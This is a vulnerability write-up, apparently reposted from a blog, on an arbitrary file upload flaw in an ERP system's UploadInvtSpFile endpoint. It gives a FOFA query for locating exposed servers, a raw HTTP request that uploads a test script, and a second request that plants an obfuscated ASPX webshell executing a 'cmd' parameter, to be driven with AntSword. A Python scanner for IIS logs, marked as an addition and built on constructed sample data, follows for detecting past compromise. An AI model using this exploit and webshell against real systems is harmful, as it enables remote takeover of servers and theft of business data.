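0x01 Vulnerability description:
The UploadInvtSpFile endpoint of the 某景 ERP management system has an arbitrary file upload vulnerability. It allows an attacker to upload malicious files to the server, which may lead to remote code execution, website defacement, or other attacks, and seriously threatens system and data security.
0x02 Search query:
FOFA: body="/api/DBRecord/getDBRecords"
0x03 Reproduction: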
POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=-----------------1111
Content-Length: 178
-------------------1111
Content-Disposition: form-data; name="filedata"; filename="2142142142.asp"
Content-Type: image/png
<% response.write("helloWorld")%>
-------------------1111--
Append the path returned in the response to the base URL and request it:
http://your-ip/InvtSpFiles/4f6d2ed2-57c5-44e1-9090-1317c2023761.asp
GetShell
POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=-----------------1111
Content-Length: 178
-------------------1111
Content-Disposition: form-data; name="filedata"; filename="2142142142.aspx"
Content-Type: image/png
<% function EfmB6149(){var GEPH="unsa",YACK="fe",C6E1=GEPH+YACK;return C6E1;}var PAY:String=Request["cmd"];~eval/*Zd0216312v*/(PAY,EfmB6149());%><%@Page Language = JS%>
-------------------1111--
Connect with AntSword.
0x04 Remediation:
The vendor has released a patch. Apply it promptly.
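To check whether a host was already hit before patching, the following added example (not part of the original post) scans IIS W3C access logs for requests to server-side script files under /InvtSpFiles/ and notes whether the same client had earlier POSTed to the upload endpoint. The log field layout, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re

UPLOAD_PATH = "/api/cginvtsp/uploadinvtspfile"   # endpoint named in this write-up
# Script types IIS may execute; an attachment directory should never serve these (assumed list).
SCRIPT_EXT = re.compile(r"^/invtspfiles/[^/]+\.(asp|aspx|ashx|asmx|asa|cer)$", re.I)

def parse_w3c(lines):
    """Yield one dict per request, using the #Fields directive to name columns."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):      # skip truncated or malformed rows
                yield dict(zip(fields, values))

def find_suspicious(lines):
    """Return requests for script files in the upload directory."""
    uploaders, hits = set(), []
    for row in parse_w3c(lines):
        stem = row.get("cs-uri-stem", "").lower()
        ip = row.get("c-ip", "-")
        if row.get("cs-method") == "POST" and stem == UPLOAD_PATH:
            uploaders.add(ip)                   # remember who used the upload API
        elif SCRIPT_EXT.match(stem):
            hits.append({
                "time": f'{row.get("date", "")} {row.get("time", "")}'.strip(),
                "ip": ip,
                "path": row["cs-uri-stem"],
                "status": row.get("sc-status", "-"),
                "uploaded_first": ip in uploaders,
            })
    return hits

# Constructed sample log (documentation IP ranges, placeholder GUIDs).
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-01 10:00:00 203.0.113.7 POST /api/cgInvtSp/UploadInvtSpFile 200
2024-01-01 10:00:05 203.0.113.7 GET /InvtSpFiles/00000000-0000-0000-0000-000000000000.asp 200
2024-01-01 10:01:00 198.51.100.9 GET /InvtSpFiles/report.pdf 200
2024-01-01 10:02:00 198.51.100.9 GET /InvtSpFiles/11111111-1111-1111-1111-111111111111.aspx 404
""".splitlines()

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 and `uploaded_first` set means a script file was uploaded and then served, so the file on disk should be preserved for analysis and the host treated as compromised.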
From: https://blog.csdn.net/xc_214/article/details/142252506